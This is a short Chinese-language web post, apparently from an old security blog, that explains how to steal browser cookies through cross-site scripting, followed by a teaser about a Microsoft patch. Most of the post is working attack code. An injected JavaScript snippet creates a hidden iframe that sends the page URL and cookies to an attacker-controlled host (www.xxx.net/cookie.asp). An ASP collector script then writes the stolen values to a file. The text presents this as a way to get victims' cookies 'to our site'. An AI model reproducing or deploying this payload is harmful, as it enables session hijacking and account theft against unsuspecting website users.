偷取cookie,通过以下脚本引入一个js,document.write("<script src=xx.js></script>"),然后js内容为:
var code;
var target = "http://www.xxx.net/cookie.asp?";
info=escape(document.location+"@@@"+document.cookie);
target=target+info;
code="<iframe style='display:none;' src=";
code=code+target;
code=code+" width=0 height=0></iframe>";
document.write(code);
这样就可以将cookie等信息传到我们的站点了!cookie.asp内容为:
dim fso,file,str
str=unescape(request.servervariables("query_string"))
const forreading = 1, forwriting = 2, forappending = 8
set fso = server.createobject("scripting.filesystemobject")
path = server.mappath("xxx.txt")
set file=fso.opentextfile(path, forappending, true)
file.write("xss:")
file.write(str)
file.write vbcrlf
file.close
set file = nothing
set fso = nothing
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
-
-
-
-
-
-
-
-
-
微软有史以来最严重漏洞的弥补
6月10日凌晨微软发布了有史以来严重漏洞补丁升级公告!我们先看看严重会对用户直接造成经济损失的漏洞情况:
严重-MS09-022:Windows 打印后台处理...
[阅读全文]
网友评论